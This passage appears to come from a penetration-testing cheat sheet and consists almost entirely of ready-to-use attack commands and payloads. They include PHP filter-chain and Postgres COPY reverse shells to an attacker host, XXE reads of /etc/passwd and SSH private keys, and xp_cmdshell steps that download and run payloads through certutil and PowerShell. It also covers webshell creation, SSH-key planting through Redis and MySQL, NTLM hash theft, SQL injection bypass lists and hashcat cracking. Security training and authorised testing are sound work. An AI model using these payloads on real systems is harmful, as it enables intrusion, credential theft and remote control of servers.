---\u003e|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp\u00260=\u003cCOMMAND\u003e\n```\n\n```c\npython3 php_filter_chain_generator.py --chain \"\u003c?php exec('/bin/bash -c \\\"bash -i \u003e\u0026 /dev/tcp/\u003cLHOST\u003e/\u003cLPORT\u003e 0\u003e\u00261\\\"'); ?\u003e\" | grep \"^php\" \u003e \u003cFILE\u003e\n```\n\n```c\ncurl \"http://\u003cRHOST\u003e/index.php?file=$(cat \u003cFILE\u003e)\"\n```\n\n#### PHP Generic Gadget Chains (PHPGGC)\n\n```c\nphpggc -u --fast-destruct Guzzle/FW1 /dev/shm/\u003cFILE\u003e.txt /PATH/TO/FILE/\u003cFILE\u003e.txt\n```\n\n#### Server-Side Request Forgery (SSRF)\n\n```c\nhttps://\u003cRHOST\u003e/item/2?server=server.\u003cRHOST\u003e/file?id=9\u0026x=\n```\n\n#### Server-Side Template Injection (SSTI)\n\n##### Fuzz String\n\n\u003e https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti\n\n```c\n${{\u003c%[%'\"}}%\\.\n```\n\n##### Magic Payload\n\n\u003e https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee\n\n```c\n{{ ‘’.__class__.__mro__[1].__subclasses__() }}\n```\n\n#### Upload Vulnerabilities\n\n```c\nASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution\nSVG: Stored XSS / Server-Side Request Forgery\nGIF: Stored XSS\nCSV: CSV Injection\nXML: XXE\nAVI: Local File Inclusion / Server-Side request Forgery\nHTML/JS: HTML Injection / XSS / Open Redirect\nPNG / JPEG: Pixel Flood Attack\nZIP: Remote Code Exection via Local File Inclusion\nPDF / PPTX: Server-Side Request Forgery / Blind XXE\n```\n\n#### wfuzz\n\n```c\nwfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://\u003cRHOST\u003e/FUZZ/\u003cFILE\u003e.php --hc '403,404'\n```\n\n##### Write to File\n\n```c\nwfuzz -w /PATH/TO/WORDLIST -c -f \u003cFILE\u003e -u http://\u003cRHOST\u003e --hc 403,404\n```\n\n##### Custom Scan with limited Output\n\n```c\nwfuzz -w /PATH/TO/WORDLIST -u http://\u003cRHOST\u003e/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20\n```\n\n##### Fuzzing two Parameters at once\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://\u003cRHOST\u003e:/\u003cdirectory\u003e/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c\n```\n\n##### Domain\n\n```c\nwfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.\u003cRHOST\u003e' -u http://\u003cRHOST\u003e/\n```\n\n##### Subdomain\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H \"Host: FUZZ.\u003cRHOST\u003e\" --hc 200 --hw 356 -t 100 \u003cRHOST\u003e\n```\n\n##### Git\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://\u003cRHOST\u003e/FUZZ --hc 403,404\n```\n##### Login\n\n```c\nwfuzz -X POST -u \"http://\u003cRHOST\u003e:\u003cRPORT\u003e/login.php\" -d \"email=FUZZ\u0026password=\u003cPASSWORD\u003e\" -w /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --hc 200 -c\nwfuzz -X POST -u \"http://\u003cRHOST\u003e:\u003cRPORT\u003e/login.php\" -d \"username=FUZZ\u0026password=\u003cPASSWORD\u003e\" -w /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --ss \"Invalid login\"\n```\n\n##### SQL\n\n```c\nwfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://\u003cRHOST\u003e/select http\n```\n\n##### DNS\n\n```c\nwfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H \"Origin: http://FUZZ.\u003cRHOST\u003e\" --filter \"r.headers.response~'Access-Control-Allow-Origin'\" http://\u003cRHOST\u003e/\nwfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H \"Host: FUZZ.\u003cRHOST\u003e\" -u http://\u003cRHOST\u003e -t 100\nwfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H \"Host: FUZZ.\u003cRHOST\u003e\" -u http://\u003cRHOST\u003e --hw \u003cvalue\u003e -t 100\n```\n\n##### Numbering Files\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip\n```\n\n##### Enumerating PIDs\n\n```c\nwfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000\n```\n\n#### WPScan\n\n```c\nwpscan --url https://\u003cRHOST\u003e --enumerate u,t,p\nwpscan --url https://\u003cRHOST\u003e --plugins-detection aggressive\nwpscan --url https://\u003cRHOST\u003e --disable-tls-checks\nwpscan --url https://\u003cRHOST\u003e --disable-tls-checks --enumerate u,t,p\nwpscan --url http://\u003cRHOST\u003e -U \u003cUSERNAME\u003e -P passwords.txt -t 50\n```\n\n#### XML External Entity (XXE)\n\n##### Skeleton Payload Request\n\n```c\nGET / HTTP/1.1\nHost: \u003cRHOST\u003e:\u003cRPORT\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Length: 136\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\" ?\u003e\n\u003c!DOCTYPE test [\u003c!ENTITY xxe SYSTEM \"http://\u003cLHOST\u003e:80/shell.php\" \u003e]\u003e\n\u003cfoo\u003e\u0026xxe;\u003c/foo\u003e\n```\n\n##### Payloads\n\n```c\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u003c!DOCTYPE xxe [ \u003c!ENTITY passwd SYSTEM 'file:///etc/passwd'\u003e ]\u003e\n \u003cstockCheck\u003e\u003cproductId\u003e\u0026passwd;\u003c/productId\u003e\u003cstoreId\u003e1\u003c/storeId\u003e\u003c/stockCheck\u003e\n```\n\n```c\n\u003c?xml version=\"1.0\"?\u003e\u003c!DOCTYPE root [\u003c!ENTITY test SYSTEM 'file:///c:/windows/win.ini'\u003e]\u003e\u003corder\u003e\u003cquantity\u003e3\u003c/quantity\u003e\u003citem\u003e\u0026test;\u003c/item\u003e\u003caddress\u003e17th Estate, CA\u003c/address\u003e\u003c/order\u003e\n```\n\n```c\nusername=%26username%3b\u0026version=1.0.0--\u003e\u003c!DOCTYPE+username+[+\u003c!ENTITY+username+SYSTEM+\"/root/.ssh/id_rsa\"\u003e+]\u003e\u003c!--\n```\n\n### Database Analysis\n\n#### impacket-mssqlclient\n\n##### Common Commands\n\n```c\nenum_logins\nenum_impersonate\n```\n\n##### Connection\n\n```c\nimpacket-mssqlclient \u003cUSERNAME\u003e@\u003cRHOST\u003e\nimpacket-mssqlclient \u003cUSERNAME\u003e@\u003cRHOST\u003e -windows-auth\nimpacket-mssqlclient -k -no-pass \u003cRHOST\u003e\nimpacket-mssqlclient \u003cRHOST\u003e/\u003cUSERNAME\u003e:\u003cUSERNAME\u003e@\u003cRHOST\u003e -windows-auth\n```\n\n```c\nexport KRB5CCNAME=\u003cUSERNAME\u003e.ccache\nimpacket-mssqlclient -k \u003cRHOST\u003e.\u003cDOMAIN\u003e\n```\n\n#### MongoDB\n\n```c\nmongo \"mongodb://localhost:27017\"\n```\n\n```c\n\u003e use \u003cDATABASE\u003e;\n\u003e show tables;\n\u003e show collections;\n\u003e db.system.keys.find();\n\u003e db.users.find();\n\u003e db.getUsers();\n\u003e db.getUsers({showCredentials: true});\n\u003e db.accounts.find();\n\u003e db.accounts.find().pretty();\n\u003e use admin;\n```\n\n##### User Password Reset to \"12345\"\n\n```c\n\u003e db.getCollection('users').update({username:\"admin\"}, { $set: {\"services\" : { \"password\" : {\"bcrypt\" : \"$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG\" } } } })\n```\n\n#### MSSQL\n\n##### Connection\n\n```c\nsqlcmd -S \u003cRHOST\u003e -U \u003cUSERNAME\u003e -P '\u003cPASSWORD\u003e'\nimpacket-mssqlclient \u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e -windows-auth\n```\n\n##### Common Commands\n\n```c\nSELECT @@version;\nSELECT name FROM sys.databases;\nSELECT * FROM \u003cDATABASE\u003e.information_schema.tables;\nSELECT * FROM \u003cDATABASE\u003e.dbo.users;\n```\n\n##### Show Database Content\n\n```c\n1\u003e SELECT name FROM master.sys.databases\n2\u003e go\n```\n\n##### OPENQUERY\n\n```c\n1\u003e select * from openquery(\"web\\clients\", 'select name from master.sys.databases');\n2\u003e go\n```\n\n```c\n1\u003e select * from openquery(\"web\\clients\", 'select name from clients.sys.objects');\n2\u003e go\n```\n\n##### Binary Extraction as Base64\n\n```c\n1\u003e select cast((select content from openquery([web\\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64;\n2\u003e go \u003e export.txt\n```\n\n##### Steal NetNTLM Hash / Relay Attack\n\n```c\nSQL\u003e exec master.dbo.xp_dirtree '\\\\\u003cLHOST\u003e\\FOOBAR'\n```\n\n##### Linked SQL Server Enumeration\n\n```c\nSQL\u003e SELECT user_name();\nSQL\u003e SELECT name,sysadmin FROM syslogins;\nSQL\u003e SELECT srvname,isremote FROM sysservers;\nSQL\u003e EXEC ('SELECT current_user') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e];\nSQL\u003e EXEC ('SELECT srvname,isremote FROM sysservers') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e];\nSQL\u003e EXEC ('EXEC (''SELECT suser_name()'') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e]') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e];\n```\n\n##### xp_cmdshell\n\n```c\nSQL\u003e EXECUTE AS LOGIN = 'sa';\nSQL\u003e EXEC sp_configure 'Show Advanced Options', 1; \nSQL\u003e RECONFIGURE; \nSQL\u003e EXEC sp_configure 'xp_cmdshell', 1; \nSQL\u003e RECONFIGURE;\nSQL\u003e EXEC xp_cmdshell 'dir';\n```\n\n```c\nSQL\u003e EXEC sp_configure 'Show Advanced Options', 1;\nSQL\u003e reconfigure;\nSQL\u003e sp_configure;\nSQL\u003e EXEC sp_configure 'xp_cmdshell', 1;\nSQL\u003e reconfigure\nSQL\u003e xp_cmdshell \"whoami\"\n```\n\n```c\nSQL\u003e enable_xp_cmdshell\nSQL\u003e xp_cmdshell whoami\n```\n\n```c\n';EXEC master.dbo.xp_cmdshell 'ping \u003cLHOST\u003e';--\n';EXEC master.dbo.xp_cmdshell 'certutil -urlcache -split -f http://\u003cLHOST\u003e/shell.exe C:\\\\Windows\\temp\\\u003cFILE\u003e.exe';--\n';EXEC master.dbo.xp_cmdshell 'cmd /c C:\\\\Windows\\\\temp\\\\\u003cFILE\u003e.exe';--\n```\n\n#### MySQL\n\n```c\nmysql -u root -p\nmysql -u \u003cUSERNAME\u003e -h \u003cRHOST\u003e -p\nmysql -u \u003cUSERNAME\u003e -h \u003cRHOST\u003e -p --skip-ssl\n```\n\n```c\nmysql\u003e STATUS;\nmysql\u003e SHOW databases;\nmysql\u003e USE \u003cDATABASE\u003e;\nmysql\u003e SHOW tables;\nmysql\u003e DESCRIBE \u003cTABLE\u003e;\nmysql\u003e SELECT version();\nmysql\u003e SELECT system_user();\nmysql\u003e SELECT * FROM Users;\nmysql\u003e SELECT * FROM users \\G;\nmysql\u003e SELECT Username,Password FROM Users;\nmusql\u003e SELECT user, authentication_string FROM mysql.user WHERE user = '\u003cUSERNAME\u003e';\nmysql\u003e SELECT LOAD_FILE('/etc/passwd');\nmysql\u003e SELECT LOAD_FILE('C:\\\\PATH\\\\TO\\\\FILE\\\\\u003cFILE\u003e');\nmysql\u003e SHOW GRANTS FOR '\u003cUSERNAME\u003e'@'localhost' \\G;\n```\n\n##### Update User Password\n\n```c\nmysql\u003e update user set password = '37b08599d3f323491a66feabbb5b26af' where user_id = 1;\n```\n\n##### Drop a Shell\n\n```c\nmysql\u003e \\! /bin/sh\n```\n\n##### Insert Code to get executed\n\n```c\nmysql\u003e insert into users (id, email) values (\u003cLPORT\u003e, \"- E $(bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cLHOST\u003e/\u003cLPORT\u003e 0\u003e\u00261')\");\n```\n\n##### Write SSH Key into authorized_keys2 file\n\n```c\nmysql\u003e SELECT \"\u003cKEY\u003e\" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '\\n';\n```\n\n#### NoSQL Injection\n\n```c\nadmin'||''==='\n{\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null} }\n```\n\n#### PostgreSQL\n\n```c\npsql\npsql -h \u003cLHOST\u003e -U \u003cUSERNAME\u003e -c \"\u003cCOMMAND\u003e;\"\npsql -h \u003cRHOST\u003e -p 5432 -U \u003cUSERNAME\u003e -d \u003cDATABASE\u003e\npsql -h \u003cRHOST\u003e -p 5432 -U \u003cUSERNAME\u003e -d \u003cDATABASE\u003e\n```\n\n##### Common Commands\n\n```c\npostgres=# \\list                     // list all databases\npostgres=# \\c                        // use database\npostgres=# \\c \u003cDATABASE\u003e             // use specific database\npostgres=# \\s                        // command history\npostgres=# \\q                        // quit\n\u003cDATABASE\u003e=# \\dt                     // list tables from current schema\n\u003cDATABASE\u003e=# \\dt *.*                 // list tables from all schema\n\u003cDATABASE\u003e=# \\du                     // list users roles\n\u003cDATABASE\u003e=# \\du+                    // list users roles\n\u003cDATABASE\u003e=# SELECT user;            // get current user\n\u003cDATABASE\u003e=# TABLE \u003cTABLE\u003e;          // select table\n\u003cDATABASE\u003e=# SELECT usename, passwd from pg_shadow;                         // read credentials\n\u003cDATABASE\u003e=# SELECT * FROM pg_ls_dir('/'); --                               // read directories\n\u003cDATABASE\u003e=# SELECT pg_read_file('/PATH/TO/FILE/\u003cFILE\u003e', 0, 1000000); --    // read a file\n```\n\n##### Postgres Remote Code Execution\n\n```c\n\u003cDATABASE\u003e=# DROP TABLE IF EXISTS cmd_exec;\n\u003cDATABASE\u003e=# CREATE TABLE cmd_exec(cmd_output text);\n\u003cDATABASE\u003e=# COPY cmd_exec FROM PROGRAM 'id';\n\u003cDATABASE\u003e=# SELECT * FROM cmd_exec;\n\u003cDATABASE\u003e=# DROP TABLE IF EXISTS cmd_exec;\n```\n\nor\n\n```c\n\u003cDATABASE\u003e=# COPY (SELECT pg_backend_pid()) TO PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2\u003e\u00261|nc \u003cLHOST\u003e \u003cLPORT\u003e \u003e/tmp/f';\n\u003cDATABASE\u003e=# COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"\u003cLHOST\u003e:\u003cLPORT\u003e\");STDIN-\u003efdopen($c,r);$~-\u003efdopen($c,w);system$_ while\u003c\u003e;''';\n\u003cDATABASE\u003e=# COPY (SELECT CAST('cp /bin/bash /var/lib/postgresql/bash;chmod 4777 /var/lib/postgresql/bash;' AS text)) TO '/var/lib/postgresql/.profile';\"\n```\n\n#### Redis\n\n```c\n\u003e AUTH \u003cPASSWORD\u003e\n\u003e AUTH \u003cUSERNAME\u003e \u003cPASSWORD\u003e\n\u003e INFO SERVER\n\u003e INFO keyspace\n\u003e CONFIG GET *\n\u003e SELECT \u003cNUMBER\u003e\n\u003e KEYS *\n\u003e HSET       // set value if a field within a hash data structure\n\u003e HGET       // retrieves a field and his value from a hash data structure\n\u003e HKEYS      // retrieves all field names from a hash data structure\n\u003e HGETALL    // retrieves all fields and values from a hash data structure\n\u003e GET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b\n\u003e SET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b \"username|s:8:\\\"\u003cUSERNAME\u003e\\\";role|s:5:\\\"admin\\\";auth|s:4:\\\"True\\\";\" # the value \"s:8\" has to match the length of the username\n```\n\n##### Enter own SSH Key\n\n```c\nredis-cli -h \u003cRHOST\u003e\necho \"FLUSHALL\" | redis-cli -h \u003cRHOST\u003e\n(echo -e \"\\n\\n\"; cat ~/.ssh/id_rsa.pub; echo -e \"\\n\\n\") \u003e /PATH/TO/FILE/\u003cFILE\u003e.txt\ncat /PATH/TO/FILE/\u003cFILE\u003e.txt | redis-cli -h \u003cRHOST\u003e -x set s-key\n\u003cRHOST\u003e:6379\u003e get s-key\n\u003cRHOST\u003e:6379\u003e CONFIG GET dir\n1) \"dir\"\n2) \"/var/lib/redis\"\n\u003cRHOST\u003e:6379\u003e CONFIG SET dir /var/lib/redis/.ssh\nOK\n\u003cRHOST\u003e:6379\u003e CONFIG SET dbfilename authorized_keys\nOK\n\u003cRHOST\u003e:6379\u003e CONFIG GET dbfilename\n1) \"dbfilename\"\n2) \"authorized_keys\"\n\u003cRHOST\u003e:6379\u003e save\nOK\n```\n\n#### SQL Injection\n\n##### Master List\n\n```c\n';#---              // insert everywhere! Shoutout to xsudoxx!\nadmin' or '1'='1\n' or '1'='1\n\" or \"1\"=\"1\n\" or \"1\"=\"1\"--\n\" or \"1\"=\"1\"/*\n\" or \"1\"=\"1\"#\n\" or 1=1\n\" or 1=1 --\n\" or 1=1 -\n\" or 1=1--\n\" or 1=1/*\n\" or 1=1#\n\" or 1=1-\n\") or \"1\"=\"1\n\") or \"1\"=\"1\"--\n\") or \"1\"=\"1\"/*\n\") or \"1\"=\"1\"#\n\") or (\"1\"=\"1\n\") or (\"1\"=\"1\"--\n\") or (\"1\"=\"1\"/*\n\") or (\"1\"=\"1\"#\n) or '1`='1-\n```\n\n##### Authentication Bypass\n\n```c\n'-'\n' '\n'\u0026'\n'^'\n'*'\n' or 1=1 limit 1 -- -+\n'=\"or'\n' or ''-'\n' or '' '\n' or ''\u0026'\n' or ''^'\n' or ''*'\n'-||0'\n\"-||0\"\n' || '1'='1';-- -\n\"-\"\n\" \"\n\"\u0026\"\n\"^\"\n\"*\"\n'--'\n\"--\"\n'--' / \"--\"\n\" or \"\"-\"\n\" or \"\" \"\n\" or \"\"\u0026\"\n\" or \"\"^\"\n\" or \"\"*\"\nor true--\n\" or true--\n' or true--\n\") or true--\n') or true--\n' or 'x'='x\n') or ('x')=('x\n')) or (('x'))=(('x\n\" or \"x\"=\"x\n\") or (\"x\")=(\"x\n\")) or ((\"x\"))=((\"x\nor 2 like 2\nor 1=1\nor 1=1--\nor 1=1#\nor 1=1/*\nadmin' --\nadmin' -- -\nadmin' #\nadmin'/*\nadmin' or '2' LIKE '1\nadmin' or 2 LIKE 2--\nadmin' or 2 LIKE 2#\nadmin') or 2 LIKE 2#\nadmin') or 2 LIKE 2--\nadmin') or ('2' LIKE '2\nadmin') or ('2' LIKE '2'#\nadmin') or ('2' LIKE '2'/*\nadmin' or '1'='1\nadmin' or '1'='1'--\nadmin' or '1'='1'#\nadmin' or '1'='1'/*\nadmin'or 1=1 or ''='\nadmin' or 1=1\nadmin' or 1=1--\nadmin' or 1=1#\nadmin' or 1=1/*\nadmin') or ('1'='1\nadmin') or ('1'='1'--\nadmin') or ('1'='1'#\nadmin') or ('1'='1'/*\nadmin') or '1'='1\nadmin') or '1'='1'--\nadmin') or '1'='1'#\nadmin') or '1'='1'/*\n1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055\nadmin\" --\nadmin';-- azer\nadmin\" #\nadmin\"/*\nadmin\" or \"1\"=\"1\nadmin\" or \"1\"=\"1\"--\nadmin\" or \"1\"=\"1\"#\nadmin\" or \"1\"=\"1\"/*\nadmin\"or 1=1 or \"\"=\"\nadmin\" or 1=1\nadmin\" or 1=1--\nadmin\" or 1=1#\nadmin\" or 1=1/*\nadmin\") or (\"1\"=\"1\nadmin\") or (\"1\"=\"1\"--\nadmin\") or (\"1\"=\"1\"#\nadmin\") or (\"1\"=\"1\"/*\nadmin\") or \"1\"=\"1\nadmin\") or \"1\"=\"1\"--\nadmin\") or \"1\"=\"1\"#\nadmin\") or \"1\"=\"1\"/*\n1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055\n```\n\n#### Common Injections\n\n##### MySQL \u0026 MariaDB\n\n###### Get Number of Columns\n\n```c\n-1 order by 3;#\n```\n\n###### Get Version\n\n```c\n-1 union select 1,2,version();#\n```\n\n###### Get Database Name\n\n```c\n-1 union select 1,2,database();#\n```\n\n###### Get Table Name\n\n```c\n-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=\"\u003cDATABASE\u003e\";#\n```\n\n###### Get Column Name\n\n```c\n-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema=\"\u003cDATABASE\u003e\" and table_name=\"\u003cTABLE\u003e\";#\n```\n\n###### Read a File\n\n```c\nSELECT LOAD_FILE('/etc/passwd')\n```\n\n###### Dump Data\n\n```c\n-1 union select 1,2, group_concat(\u003cCOLUMN\u003e) from \u003cDATABASE\u003e.\u003cTABLE\u003e;#\n```\n\n###### Create Webshell\n\n```c\nLOAD_FILE('/etc/httpd/conf/httpd.conf')\nselect \"\u003c?php system($_GET['cmd']);?\u003e\" into outfile \"/var/www/html/\u003cFILE\u003e.php\";\n```\n\nor\n\n```c\nLOAD_FILE('/etc/httpd/conf/httpd.conf')\n' UNION SELECT \"\u003c?php system($_GET['cmd']);?\u003e\", null, null, null, null INTO OUTFILE \"/var/www/html/\u003cFILE\u003e.php\" -- //\n```\n\n##### MSSQL\n\n###### Authentication Bypass\n\n```c\n' or 1=1--\n```\n\n###### Get Version with Time-Based Injection\n\n```c\n' SELECT @@version; WAITFOR DELAY '00:00:10'; —\n```\n\n###### Enable xp_cmdshell\n\n```c\n' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--\n```\n\n###### Remote Code Execution (RCE)\n\n```c\n' exec xp_cmdshell \"powershell IEX (New-Object Net.WebClient).DownloadString('http://\u003cLHOST\u003e/\u003cFILE\u003e.ps1')\" ;--\n```\n\n##### Orcale SQL\n\n###### Authentication Bypass\n\n```c\n' or 1=1--\n```\n\n###### Get Number of Columns\n\n```c\n' order by 3--\n```\n\n###### Get Table Name\n\n```c\n' union select null,table_name,null from all_tables--\n```\n\n###### Get Column Name\n\n```c\n' union select null,column_name,null from all_tab_columns where table_name='\u003cTABLE\u003e'--\n```\n\n###### Dump Data\n\n```c\n' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--\n```\n\n##### SQLite\n\n###### Extracting Table Names\n\n```c\nhttp://\u003cRHOST\u003e/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--\n```\n\n###### Extracting User Table\n\n```c\nhttp://\u003cRHOST\u003e/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users--\n```\n\n##### Error-based SQL Injection (SQLi)\n\n```c\n\u003cUSERNAME\u003e' OR 1=1 -- //\n```\n\nResults in:\n\n```c\nSELECT * FROM users WHERE user_name= '\u003cUSERNAME\u003e' OR 1=1 --\n```\n\n```c\n' or 1=1 in (select @@version) -- //\n' OR 1=1 in (SELECT * FROM users) -- //\n' or 1=1 in (SELECT password FROM users) -- //\n' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //\n```\n\n##### UNION-based SQL Injection (SQLi)\n\n###### Manual Injection Steps\n\n```c\n$query = \"SELECT * FROM customers WHERE name LIKE '\".$_POST[\"search_input\"].\"%'\";\n```\n\n```c\n' ORDER BY 1-- //\n```\n\n```c\n%' UNION SELECT database(), user(), @@version, null, null -- //\n```\n\n```c\n' UNION SELECT null, null, database(), user(), @@version  -- //\n```\n\n```c\n' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //\n```\n\n```c\n' UNION SELECT null, username, password, description, null FROM users -- //\n```\n\n##### Blind SQL Injection (SQLi)\n\n```c\nhttp://\u003cRHOST\u003e/index.php?user=\u003cUSERNAME\u003e' AND 1=1 -- //\n```\n\n```c\nhttp://\u003cRHOST\u003e/index.php?user=\u003cUSERNAME\u003e' AND IF (1=1, sleep(3),'false') -- //\n```\n\n#### SQL Truncation Attack\n\n```c\n'admin@\u003cFQDN\u003e' = 'admin@\u003cFQDN\u003e++++++++++++++++++++++++++++++++++++++htb'\n```\n\n#### sqlite3\n\n```c\nsqlite3 \u003cFILE\u003e.db\n```\n\n```c\nsqlite\u003e .tables\nsqlite\u003e PRAGMA table_info(\u003cTABLE\u003e);\nsqlite\u003e SELECT * FROM \u003cTABLE\u003e;\n```\n\n#### sqsh\n\n```c\nsqsh -S \u003cRHOST\u003e -U \u003cUSERNAME\u003e\nsqsh -S '\u003cRHOST\u003e' -U '\u003cUSERNAME\u003e' -P '\u003cPASSWORD\u003e'\nsqsh -S '\u003cRHOST\u003e' -U '.\\\u003cUSERNAME\u003e' -P '\u003cPASSWORD\u003e'\n```\n\n##### List Files and Folders with xp_dirtree\n\n```c\nEXEC master.sys.xp_dirtree N'C:\\inetpub\\wwwroot\\',1,1;\n```\n\n### Password Attacks\n\n## DonPAPI\n\n```c\nDonPAPI \u003cDOMAIN\u003e/\u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e\nDonPAPI -local_auth \u003cUSERNAME\u003e@\u003cRHOST\u003e\nDonPAPI --hashes \u003cLM\u003e:\u003cNT\u003e \u003cDOMAIN\u003e/\u003cUSERNAME\u003e@\u003cRHOST\u003e\nDonPAPI -laps \u003cDOMAIN\u003e/\u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e\n```\n\n#### fcrack\n\n```c\nfcrackzip -u -D -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e \u003cFILE\u003e.zip\n```\n\n#### Group Policy Preferences (GPP)\n\n##### gpp-decrypt\n\n```c\npython3 gpp-decrypt.py -f Groups.xml\npython3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ\n```\n\n#### hashcat\n\n\u003e https://hashcat.net/hashcat/\n\n\u003e https://hashcat.net/wiki/doku.php?id=hashcat\n\n\u003e https://hashcat.net/cap2hashcat/\n\n\u003e https://hashcat.net/wiki/doku.php?id=example_hashes\n\n```c\nhashcat -m 0 md5 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 100 sha-1 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 1400 sha256 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 3200 bcrypt /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 900 md4 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 1000 ntlm /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 1800 sha512 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 160 hmac-sha1 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force\nhashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u  --force hash.txt ?3?3?1?1?1?1?2?3\n```\n\n```c\nhashcat --example-hashes\nhashcat --help | grep -i \"ntlm\"\n```\n\n```c\nhashcat --identify --user \u003cFILE\u003e\n```\n\n```c\n/usr/share/wordlists/fasttrack.txt\n/usr/share/hashcat/rules/best64.rule\n```\n\n##### Custom Rules\n\n\u003e https://hashcat.net/wiki/doku.php?id=rule_based_attack\n\n###### Add a 1 to each Password\n\n```c\necho \\$1 \u003e \u003cFILE\u003e.rule\n```\n\n###### Capitalize first character\n\n```c\n$1\nc\n```\n\n###### Add nothing, a 1 or a ! to an existing Wordlist\n\n```c\n:\n$1\n$!\n```\n\n###### Rule for upper case Letter, numerical Value and special Character\n\n- $1 \u003e appends a \"1\"\n- $2 \u003e appends a \"2\"\n- $3 \u003e appends a \"3\"\n- c \u003e Capitalize the first character and lower case the rest\n\n```c\n$1 c $!\n$2 c $!\n$1 $2 $3 c $!\n```\n\n###### Rule Preview\n\n```c\nhashcat -r \u003cFILE\u003e.rule --stdout \u003cFILE\u003e.txt\n```\n\n##### Cracking ASPREPRoast Password File\n\n```c\nhashcat -m 18200 -a 0 \u003cFILE\u003e \u003cFILE\u003e\n```\n\n##### Cracking Kerberoasting Password File\n\n```c\nhashcat -m 13100 --force \u003cFILE\u003e \u003cFILE\u003e\n```\n\n##### Bruteforce based on the Pattern\n\n```c\nhashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout\n```\n\n##### Generate Password Candidates: Wordlist + Pattern\n\n```c\nhashcat -a6 -m0 